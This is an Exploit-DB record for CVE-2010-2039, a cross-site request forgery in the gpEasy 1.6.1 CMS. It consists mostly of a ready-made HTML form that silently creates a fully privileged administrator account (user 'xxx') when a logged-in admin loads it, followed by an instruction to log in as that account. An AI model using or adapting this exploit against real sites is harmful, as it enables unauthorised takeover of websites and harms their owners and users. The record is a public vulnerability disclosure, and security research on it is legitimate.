gpEasy 1.6.1 - Cross-Site Request Forgery (Add Admin)

Author: Giuseppe 'giudinvx' D'Inverno
type: webapps
platform: php
port: 
date_added: 2010-04-27 
date_updated:  
verified: 1 
codes: OSVDB-64130;CVE-2010-2039 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comgpEasy_1.6.1.tar.gz

=============================================
gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit
=============================================

Author : Giuseppe 'giudinvx' D'Inverno
Email : <giudinvx[at]gmail[dot]com>
Date : 04-29-2010
Site     : http://www.giudinvx.altervista.org/
Location : Naples, Italy

--------------------------------------------------------
Application Info
Site   : http://www.gpeasy.com/
Version: 1.6.1
--------------------------------------------------------

==============[[ -Exploit Code- ]]==============

<html>
<form method="post" action="[patth]/index.php/Admin_Users">
<input type="text" value="xxx" name="username"><br/>
<input type="password" value="xxx" name="password"><br/>
<input type="password" value="xxx" name="password1"><br/>
<input type="text" value="xxx" name="email"><br/>
<input value="Admin_Menu" type="hidden" name="grant[]">
<input value="Admin_Uploaded" type="hidden" name="grant[]">
<input value="Admin_Extra" type="hidden" name="grant[]">
<input value="Admin_Theme" type="hidden" name="grant[]">
<input value="Admin_Users" type="hidden" name="grant[]">
<input value="Admin_Configuration" type="hidden" name="grant[]">
<input value="Admin_Trash" type="hidden" name="grant[]">
<input value="Admin_Uninstall" type="hidden" name="grant[]">
<input value="Admin_Addons" type="hidden" name="grant[]">
<input value="Admin_New" type="hidden" name="grant[]">
<input value="Admin_Theme_Content" type="hidden" name="grant[]">
<input type="hidden" value="newuser" name="cmd">
<input type="submit" value="Continue" name="aaa" class="submit">
</form>
</html>

# Now you have an Admin user with name: xxx and password: xxx, just login
page [path]/index.php/Admin